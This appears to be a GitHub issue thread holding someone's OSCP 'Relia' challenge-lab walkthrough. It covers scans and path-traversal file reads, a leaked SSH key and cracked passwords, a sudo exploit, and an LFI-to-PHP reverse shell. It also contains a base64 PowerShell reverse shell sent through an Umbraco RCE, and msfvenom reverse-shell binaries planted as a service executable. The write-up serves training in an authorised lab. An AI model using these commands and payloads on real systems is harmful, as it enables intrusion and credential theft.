search

WDavid404 / OSCP

0 stars 0 forks source link

Challege Lab2 - Relia #28

Open WDavid404 opened 8 months ago

WDavid404 commented 8 months ago

Env

172.16.113.6
172.16.113.7
172.16.113.21
172.16.113.19
172.16.113.15
172.16.113.30
172.16.113.14
172.16.113.20

192.168.223.191
192.168.223.189

192.168.223.249
192.168.223.248
192.168.223.247
192.168.223.246
192.168.223.245
192.168.223.250  -  offsec / lab

nmap -sV -T5 192.168.223.245-249 192.168.223.189 192.168.223.191

Nmap scan report for 192.168.223.189
PORT      STATE    SERVICE       VERSION
25/tcp    open     smtp          hMailServer smtpd
99/tcp    filtered metagram
110/tcp   open     pop3          hMailServer pop3d
135/tcp   open     msrpc?
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open     imap          hMailServer imapd
445/tcp   open     microsoft-ds?
587/tcp   open     smtp          hMailServer smtpd
1026/tcp  filtered LSA-or-nterm
1030/tcp  filtered iad1
1059/tcp  filtered nimreg
1187/tcp  filtered alias
2005/tcp  filtered deslogin
2222/tcp  filtered EtherNetIP-1
3006/tcp  filtered deslogind
3030/tcp  filtered arepa-cas
3300/tcp  filtered ceph
3784/tcp  filtered bfd-control
3878/tcp  filtered fotogcad
5221/tcp  filtered 3exmp
5961/tcp  filtered unknown
6788/tcp  filtered smc-http
6969/tcp  filtered acmsoda
8031/tcp  filtered unknown
8042/tcp  filtered fs-agent
8654/tcp  filtered unknown
12345/tcp filtered netbus
Service Info: Host: MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.191
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 10.0
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ssl/ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.245
Host is up (0.090s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT      STATE    SERVICE      VERSION
21/tcp    open     ftp          vsftpd 2.0.8 or later
80/tcp    open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
301/tcp   filtered unknown
443/tcp   open     ssl/https    Apache/2.4.49 (Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8
1061/tcp  filtered kiosk
1092/tcp  filtered obrpd
1658/tcp  filtered sixnetudr
1761/tcp  filtered landesk-rc
1998/tcp  filtered x25-svc-port
2222/tcp  open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
3689/tcp  filtered rendezvous
4111/tcp  filtered xgrid
7201/tcp  filtered dlip
8000/tcp  open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
8181/tcp  filtered intermapper
8402/tcp  filtered abarsd
9100/tcp  filtered jetdirect
9878/tcp  filtered kca-service
19101/tcp filtered unknown
44501/tcp filtered unknown
49175/tcp filtered unknown
50800/tcp filtered unknown
Service Info: Host: RELIA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.223.246
Host is up (0.091s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT      STATE    SERVICE      VERSION
30/tcp    filtered unknown
80/tcp    open     http         Apache httpd 2.4.52 ((Ubuntu))
443/tcp   open     ssl/https    Apache/2.4.52 (Ubuntu)
1296/tcp  filtered dproxy
2222/tcp  open     ssh          OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
3003/tcp  filtered cgms
3030/tcp  filtered arepa-cas
3128/tcp  filtered squid-http
3211/tcp  filtered avsecuremgmt
4343/tcp  filtered unicall
5961/tcp  filtered unknown
6009/tcp  filtered X11:9
8200/tcp  filtered trivnet1
10566/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.223.247
Host is up (0.091s latency).
Not shown: 975 closed tcp ports (conn-refused)
PORT      STATE    SERVICE        VERSION
80/tcp    open     http           Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
211/tcp   filtered 914c-g
443/tcp   open     ssl/http       Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
445/tcp   open     microsoft-ds?
990/tcp   filtered ftps
992/tcp   filtered telnets
1072/tcp  filtered cardax
1201/tcp  filtered nucleus-sand
1218/tcp  filtered aeroflight-ads
1864/tcp  filtered paradym-31
3389/tcp  open     ms-wbt-server  Microsoft Terminal Services
4321/tcp  filtered rwhois
5214/tcp  filtered unknown
5801/tcp  filtered vnc-http-1
5910/tcp  filtered cm
6129/tcp  filtered unknown
8045/tcp  filtered unknown
9418/tcp  filtered git
16000/tcp filtered fmsas
19101/tcp filtered unknown
48080/tcp filtered unknown
64623/tcp filtered unknown
65389/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.248
Host is up (0.090s latency).
Not shown: 958 closed tcp ports (conn-refused), 37 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.223.249
Host is up (0.091s latency).
Not shown: 970 closed tcp ports (conn-refused)
PORT      STATE    SERVICE         VERSION
80/tcp    open     http            Microsoft IIS httpd 10.0
135/tcp   open     msrpc           Microsoft Windows RPC
139/tcp   open     netbios-ssn     Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
555/tcp   filtered dsf
1045/tcp  filtered fpitp
1064/tcp  filtered jstel
1098/tcp  filtered rmiactivation
1174/tcp  filtered fnet-remote-ui
1248/tcp  filtered hermes
1658/tcp  filtered sixnetudr
1935/tcp  filtered rtmp
2035/tcp  filtered imsldoc
2394/tcp  filtered ms-olap2
3389/tcp  open     ms-wbt-server   Microsoft Terminal Services
3920/tcp  filtered exasoftport1
4848/tcp  filtered appserv-http
5510/tcp  filtered secureidprop
5802/tcp  filtered vnc-http-2
6567/tcp  filtered esp
8000/tcp  filtered http-alt
8181/tcp  filtered intermapper
8649/tcp  filtered unknown
9000/tcp  filtered cslistener
15003/tcp filtered unknown
16113/tcp filtered unknown
27353/tcp filtered unknown
34572/tcp filtered unknown
44443/tcp filtered coldfusion-auth
61900/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
WDavid404 commented 8 months ago

Recon

192.168.x.250

xfreerdp /u:offsec /p:lab /w:1200 /h:800 +fonts +clipboard /v:192.168.223.250 /drive:.,kali-share /cert-ignore --> offsec has admin right.

powershell -ep bypass .\windowsEnum.ps1 > result.txt net user /domain -----> This host doesn't connect to 127.16.x.x and it is not in AD.

192.168.223.245

Nmap scan report for 192.168.223.245
PORT      STATE    SERVICE      VERSION
21/tcp    open     ftp          vsftpd 2.0.8 or later
80/tcp    open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)
443/tcp   open     ssl/https    Apache/2.4.49 (Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8
2222/tcp  open     ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8000/tcp  open     http         Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f mod_wsgi/4.9.4 Python/3.8)

OS: Windows

searchsploit vsftpd --> no useful info for windows os

We can login to FTP via anonymous --> No file there.

searchsploit apache 2.4.49 ---> 50383.sh bash 50383.sh target.txt /etc/passwd --->

...
offsec:x:1000:1000:Offsec Admin:/home/offsec:/bin/bash
miranda:x:1001:1001:Miranda:/home/miranda:/bin/sh
steven:x:1002:1002:Steven:/home/steven:/bin/sh
mark:x:1003:1003:Mark:/home/mark:/bin/sh
anita:x:1004:1004:Anita:/home/anita:/bin/sh
...

--> make a username list (users.txt)

Try to get their id_rsa file:
bash 50383.sh targets.txt /home/<username>/.ssh/id_rsa --> no info

bash 50383.sh target.txt /bin/sh id ----> no result info bash 50383.sh targets.txt /bin/sh -c 'bash -i >& /dev/tcp/192.168.45.193/4445 0>&1' ----> doesn't work

Home page --> Get some name:

try ssh -p2222 offsec@192.168.223.245 --> Failed: Permission denied (publickey)

=======> !!!! Try to get id_ecdsa instead of id_rsa: bash 50383.sh targets.txt /home/anita/.ssh/id_ecdsa

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAO+eRFhQ
13fn2kJ8qptynMAAAAEAAAAAEAAABoAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlz
dHAyNTYAAABBBK+thAjaRTfNYtnThUoCv2Ns6FQtGtaJLBpLhyb74hSOp1pn0pm0rmNThM
fArBngFjl7RJYCOTqY5Mmid0sNJwAAAACw0HaBF7zp/0Kiunf161d9NFPIY2bdCayZsxnF
ulMdp1RxRcQuNoGPkjOnyXK/hj9lZ6vTGwLyZiFseXfRi8Dd93YsG0VmEOm3BWvvCv+26M
8eyPQgiBD4dPphmNWZ0vQJ6qnbZBWCmRPCpp2nmSaT3odbRaScEUT5VnkpxmqIQfT+p8AO
CAH+RLndklWU8DpYtB4cOJG/f9Jd7Xtwg3bi1rkRKsyp8yHbA+wsfc2yLWM=
-----END OPENSSH PRIVATE KEY-----

---> copy the key above into 'ecdsa_anita' file $ chmod 600 ecdsa_anita $ ssh -i ecdsa_anita anita@192.168.249.245 -p2222 ---> Enter passphrase for key 'ecdsa_anita': ----> ssh2john ecdsa_anita > ssh_anita.hash john --wordlist=/usr/share/wordlists/rockyou.txt ssh_anita.hash ---> fireball

----> SSH login!!

192.168.x.246

A code veridation page. Try ' order by 10--// --> doesn't work.

index.html --->

192.168.x.247

Got info: "relia.com" ----> Email address would be username@relia.com

Wappalyzer: php 8.1.10 ---> searchsploit php 8.1.10

192.168.x.248

Login page: image ----------> Maybe we can try the user list (users.txt) + hydra ?

gobuster dir -u http://192.168.189.248 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config ----> /admin (Status: 302) [Size: 164] [--> http://192.168.189.248/Login?returnurl=%2fadmin] /Admin (Status: 302) [Size: 164] [--> http://192.168.189.248/Login?returnurl=%2fAdmin] /ADMIN (Status: 302) [Size: 164] [--> http://192.168.189.248/Login?returnurl=%2fADMIN] /favicon.ico (Status: 200) [Size: 5430] /home (Status: 301) [Size: 140] [--> http://192.168.189.248/] /Home (Status: 301) [Size: 140] [--> http://192.168.189.248/] /host (Status: 302) [Size: 183] [--> http://192.168.189.248/Host/ctl/Login/portalid/0?returnurl=%2fhost] /Login (Status: 200) [Size: 23091] /login (Status: 200) [Size: 23091] /logoff (Status: 302) [Size: 140] [--> http://192.168.189.248/] /privacy (Status: 200) [Size: 33566] /Privacy (Status: 200) [Size: 33566] /register (Status: 302) [Size: 167] [--> http://192.168.189.248/Login?returnurl=%2fregister] /robots.txt (Status: 200) [Size: 741] /robots.txt (Status: 200) [Size: 741] /searchresults (Status: 301) [Size: 154] [--> http://192.168.189.248/Search-Results] /search-results (Status: 200) [Size: 32372] /terms (Status: 200) [Size: 51543]

------> /privacy page ---> get info: emma@relia.com ---> add 'emma' to our user list.

192.168.x.249

A normal default IIS page.

gobuster dir -u http://192.168.189.249/ -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config ---> No info

so maybe we need to access it via RDP. but offsec/lab cannot RDP access it.

192.168.x.191

A login window. image ----------> Maybe we can try the user list (users.txt) + hydra ? hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.223.191 http-get -----> No result after a while

so maybe we need to access it via RDP. but offsec/lab cannot RDP access it.

=================>

crackmapexec smb 192.168.223.245-250 192.168.223.189 192.168.223.191 -u offsec -d relia.COM -p "lab" --shares ---->

SMB         192.168.223.189 445    MAIL             [-] relia.COM\offsec:lab STATUS_LOGON_FAILURE 
SMB         192.168.223.249 445    LEGACY           [-] relia.COM\offsec:lab STATUS_LOGON_FAILURE 
SMB         192.168.223.248 445    EXTERNAL         [+] relia.COM\offsec:lab 
SMB         192.168.223.191 445    LOGIN            [-] relia.COM\offsec:lab STATUS_LOGON_FAILURE 
SMB         192.168.223.250 445    WINPREP          [+] relia.COM\offsec:lab 
SMB         192.168.223.247 445    WEB02            [-] relia.COM\offsec:lab STATUS_LOGON_FAILURE 
SMB         192.168.223.250 445    WINPREP          [+] Enumerated shares
SMB         192.168.223.250 445    WINPREP          Share           Permissions     Remark
SMB         192.168.223.250 445    WINPREP          -----           -----------     ------
SMB         192.168.223.250 445    WINPREP          ADMIN$                          Remote Admin
SMB         192.168.223.250 445    WINPREP          C$                              Default share
SMB         192.168.223.250 445    WINPREP          IPC$            READ            Remote IPC
SMB         192.168.223.248 445    EXTERNAL         [+] Enumerated shares
SMB         192.168.223.248 445    EXTERNAL         Share           Permissions     Remark
SMB         192.168.223.248 445    EXTERNAL         -----           -----------     ------
SMB         192.168.223.248 445    EXTERNAL         ADMIN$                          Remote Admin
SMB         192.168.223.248 445    EXTERNAL         C$                              Default share
SMB         192.168.223.248 445    EXTERNAL         IPC$            READ            Remote IPC
SMB         192.168.223.248 445    EXTERNAL         transfer        READ,WRITE      
SMB         192.168.223.248 445    EXTERNAL         Users           READ

smbclient //192.168.223.248/Users --user=relia.com/offsec%lab ---> no useful info (rabbit hole)

smbclient //192.168.223.248/transfer --user=relia.com/offsec%lab ----> no useful info (rabbit hole)

WDavid404 commented 8 months ago

192.168.223.245

ssh -i ecdsa_anita anita@192.168.249.245 -p2222 Enter passphrase for key 'ecdsa_anita': fireball ---> Login successful. ----> find local.txt

ip addr ---> It doesn't connect to172.16.x.x

$ find / -perm -u=s -type f 2>/dev/null ---> /usr/bin/at /usr/bin/chfn /usr/bin/fusermount /usr/bin/mount /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/sudo /usr/bin/su /usr/bin/umount /usr/bin/passwd /usr/bin/chsh /usr/bin/newgrp ----> No useful info..

Try linpeas.sh

wget -qc http://192.168.45.193:9001/linpeas.sh chmod a+x linpeas.sh ./linpeas.sh ----> image image

searchsploit sudo 1.8.31 ---> No info

Google sudo 1.8.31 --> CVE-2021-3156 --> https://github.com/blasty/CVE-2021-3156 [Kali] Git clone https://github.com/blasty/CVE-2021-3156.git [Victim] wget -r --no-parent http://192.168.45.193:9001/CVE-2021-3156

$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
$ ./sudo-hax-me-a-sandwich  --> To list option and details
$ ./sudo-hax-me-a-sandwich 1

----> NICE, we got root!! ----> Got proof.txt

Regarding the etc/passwd and shadow, ---> cannot crack them.

Lesson

WDavid404 commented 8 months ago

192.168.223.246

ssh -i ecdsa_anita anita@192.168.249.246 -p2222 Enter passphrase for key 'ecdsa_anita': fireball ---> Login successful. ----> find local.txt

ip addr ---> It doesn't connect to172.16.x.x

$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/chfn
/usr/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/sudo
/usr/libexec/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine

----> No useful info

$ env

USER=anita
SSH_CLIENT=192.168.45.193 57376 2222
XDG_SESSION_TYPE=tty
HOME=/home/anita
MOTD_SHOWN=pam
OLDPWD=/home/anita
SSH_TTY=/dev/pts/0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
LOGNAME=anita
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/home
SSH_CONNECTION=192.168.45.193 57376 192.168.249.246 2222
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop

---->No useful info

Try linpeas.sh

wget -qc http://192.168.45.193:9001/linpeas.sh chmod a+x linpeas.sh ./linpeas.sh ----> Writable folder: /dev/shm

There is a service using 8000 on local 127.0.0.1:8000 image ---> Set up a chisel tunnel to access 8000 port

[Kali] ./chisel server -p 8000 --reverse [Victim] wget -qc http://192.168.45.243:9001/OSCP-Tools/chisel chmod a+x chisel ./chisel client 192.168.45.243:8000 R:1080:socks [Kali] proxychains -q firefox http:// 127.0.0.1:8000 --> it works: firefox can open and show webpage However, proxychains -q gobuster dir -u http://127.0.0.1:8000 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config ---> no useful info..........

Using another method: [Kali] ssh -N -L 7000:127.0.0.1:8000 -i ecdsa_anita -p 2222 anita@192.168.246.246 -> Open 127.0.0.1:7000 --> it works

gobuster dir -u http://127.0.0.1:7000 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config -> find /backend/

Access '127.0.0.1:7000/backend' --> page open as 'http://127.0.0.1:7000/backend/?view=user.inc' ---> This URL shows LFI ! (https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion)

nikto -Display 1234EP -o report.html -Format htm -Tuning 123bde -host http://127.0.0.1:7000/backend ---> no useful info

Utilitze LFI on 246's 8000 port:

http://127.0.0.1:7000/backend/?view=../../../../../etc/passwd (http://127.0.0.1:8000/backend/?view=../../../../../../../../../../../../../../../../etc/passwd also works) --> can get info

prepare test.php file under /tmp and a test1.php under /dev/shm --> works on http://127.0.0.1:7000/backend/?view=../../../../../dev/shm/test1.php

[Kali] Prepare a php reverse file:http://pentestmonkey.net/tools/php-reverse-shell and change LHOST and LPORT. [Victim] wget -qc http://192.168.45.243:9001/OSCP-Tools/php-reverse-shell.php [Kali] Access 'http://127.0.0.1:7000/backend/?view=../../../../../dev/shm/php-reverse-shell.php' ----> Get reverse from Victim as www-data image

sudo su ---> we got root! ---> got proof.txt

Regarding the etc/passwd and shadow, ---> cannot crack them.

Lesson

WDavid404 commented 8 months ago

192.168.x.247

nmap scan for all ports: nmap -sV -v -p- 192.168.x.247 (Don*t add -T5) --> found more ports: 

80/tcp    open     http               Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
443/tcp   open     ssl/http           Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/8.1.10)
445/tcp   open     microsoft-ds?
3389/tcp  open     ssl/ms-wbt-server?
5985/tcp  open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) ★
14020/tcp open     ftp                FileZilla ftpd                                          ★
14080/tcp open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)  ★
26679/tcp filtered unknown
47001/tcp open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) ★
49664/tcp open     msrpc              Microsoft Windows RPC
49665/tcp open     msrpc              Microsoft Windows RPC
49666/tcp open     msrpc              Microsoft Windows RPC
49667/tcp open     msrpc              Microsoft Windows RPC
49668/tcp open     msrpc              Microsoft Windows RPC
49669/tcp open     msrpc              Microsoft Windows RPC
49670/tcp open     msrpc              Microsoft Windows RPC

ーーーー>

ftp 192.168.213.247 -P 14020 ---> Get umbraco.pdf file ---> • the user account: mark@relia.com passwd: OathDeeplyReprieve91 • IIS is configured to only allow access to Umbraco using the server FQDN at the moment. o e.g. web02.relia.com, not just web02.

----> Add '192.168.213.247 web02.relia.com' to /etc/hosts

---> Can access "web02.relia.com:14070" but FAILED to access 'web02.relia.com:5985' or 47001 ---> Go to 'http://web02.relia.com:14080/umbraco#/login/false?returnPath=%252Fumbraco' image

Try login to page using mark@relia.com/OathDeeplyReprieve91 ---> Succeed. On 'help' menu ---> Umbraco version 7.12.4

searchsploit umbraco 7.12 ---> RCE 49488.py ---> python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c whoami works!

python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c powershell.exe -a '-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAAzACIALAA0ADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' ---> We got a reverse shell !! find local.txt under 'C:/'

find c:/xampp/passwords.txt

## MySQL (phpMyAdmin):
   User: root
   Password:
   (means no password!)

## Mercury (not in the USB & lite version): 
   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

## WEBDAV: 
   User: xampp-dav-unsecure
   Password: ppmax2011

iwr -uri http://192.168.45.243:9001/OSCP-Tools/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe .\PrintSpoofer64.exe -i -c powershell.exe ---> Failed...

iwr -uri http://192.168.45.243:9001/OSCP-Tools/winPEASx64.exe -Outfile winPEAS.exe ---> failed..

search on c:/xampp/webdav ---> URL: http://localhost/webdav/ User: wampp Password: xampp

cat c:/inetpub/wwwroot/Web.config -->

<mailSettings>
      <smtp from="noreply@example.com">
                                <network host="127.0.0.1" userName="username" password="password" />
                        </smtp>
                </mailSettings>

Check services list: Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} --> ... Apache2.4 Running "C:\xampp\apache\bin\httpd.exe" -k runservice FileZillaServer Running "C:\xampp\filezillaftp\filezillaserver.exe" ...

--> We can place a dll in "C:\xampp\apache\bin" and restart httpd.exe

[Kali] msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.243 LPORT=443 -f exe -o met.exe

nc -vlp 443

[Victim] sc.exe stop Apache2.4 mv httpd.exe httpd_bk.exe certutil -urlcache -f http://192.168.45.243:9001/met.exe C:/xampp/apache/bin/httpd.exe sc.exe start Apache2.4

---> Got root. ---> proof.txt

WDavid404 commented 8 months ago

192.168.x.248

It has 445 port --> try smb access

smbclient '//192.168.213.248/transfer' -N -c 'prompt OFF;recurse ON;mget *' // will download all files to local find a Database.kdbx file in 'DB-back (1)/New Folder/Emma/Documents'

keepass2john Database.kdbx > keepass.hash cat keepass.hash

Database:$keepass$*2*60000*0*682a0e535986c0ab7f02ef294ddfdf869d39bf9e29e17a2d521eb0cdcbd744c0*3d7849d98a8eae59f70b27b1eba401db19dbbae8c095b8be52ef08ffd05a747a*c56d10e5ace50d5924d4b6a9781af20a*947c768ced6729f3741485b9f6ee0737ad70e11933ebdb727c627fe5bc66491a*55de9df220b1d816eb6bad76da248c383a8fde3dbfb2d77e3bb50a25b5ef6133

Remove 'Database:' from keepass.hash then,

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

---> image

RDP login to 250 xfreerdp /u:offsec /p:lab /w:1200 /h:800 +fonts +clipboard /v:192.168.223.250 /drive:.,kali-share /cert-ignore

On 250 machine, download and install KeePass app, then open database.kdbx file by using the password cracked. Donwload site: https://sourceforge.net/projects/keepass/files/KeePass%202.x/2.56/KeePass-2.56-Setup.exe/download ---> image

- User Name/Password  https://keepass.info/
- Michael321/12345 https://keepass.info/help/kb/testform.html
- (retired) bo/Luigi=Papal1963  Backup Operator
- Emma/SomersetVinyl1!  Windows
- <empty>/HabitsAgesEnd123 Windows Old
- sa/SAPassword_1998   SQL

xfreerdp /u:Emma /p:SomersetVinyl1! /w:1200 /h:800 +fonts +clipboard /v:192.168.236.248 /drive:.,kali-share /cert-ignore ---> Success!! ---> Got local.txt

248 is a standlone and not in AD domain.

WinPeas.exe ----> doesn't work WIndowsEnum.ps1 ---> env variable --------> AppKey: !8@aBRBYdb3!

Manually enum: find "C:\BetaMonitor" and a log saying "Coudln't find BetaLibrary.Dll." ---> so we can made a BetaLibrary.Dll? no running process or service is associating with BetaMonitor.exe... However, if we check log file again, we can realize that some body is trying to run BetaMiror every second but failed due to the lack of BetaLibrary.dll ----> [Kali] msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.243 LPORT=443 -f dll -o BetaLibrary.dll nc -lvp 443 [Victim] place BetaLibrary.dll in 'C:\BetaMonitor' ---> Failed... Need admin permission to copy this file...

_DLL hijacking path:

  1. The directory from which the application loaded.
  2. The system directory.
  3. The 16-bit system directory.
  4. The Windows directory.
  5. The current directory.
  6. The directories that are listed in the PATH environment variable._

echo $env:path /// show all path variables info without skip ---> It has 'C:\Users\emma\AppData\Local\Microsoft\WindowsApps' ----> Doesn:t work...........

schtasks /query /fo LIST /v --->

Folder: \
HostName:                             EXTERNAL
TaskName:                             \BetaTask
Next Run Time:                        N/A
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        3/27/2024 1:44:52 AM
Last Result:                          0
Author:                               Administrator
Task To Run:                          C:\BetaMonitor\BetaMonitor.exe
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At system start up

PS C:\Users\emma> icacls C:\BetaMonitor\BetaMonitor.exe ---->

C:\BetaMonitor\BetaMonitor.exe BUILTIN\Users:(I)(RX)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)

---> we only have I and RX permission for C:\BetaMonitor\BetaMonitor.exe ------------> No way about BetaMonitor, which is a rabbit hole !!!

Run winpeas.bat --->

 [+] AppCmd
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.

---> refer tohttps://github.com/carlospolop/hacktricks/tree/master/windows-hardening/windows-local-privilege-escalation#appcmd-exe ----> But it is not intended way...

In env variable --------> AppKey: !8@aBRBYdb3! Use it as password! xfreerdp /u:mark /p:\!8@aBRBYdb3\! /w:1200 /h:800 +fonts +clipboard /v:192.168.236.248 /drive:.,kali-share /cert-ignore ----> yeah -----> proof.txt

WDavid404 commented 8 months ago

192.168.x.249

gobuster dir -u http://192.168.189.249/ -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config ---> No info

nmap scan again: nmap -sV -T4 -Pn -v 192.168.223.249 --->

80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8000/tcp open  http          Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/7.4.30) --->  ⭐

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

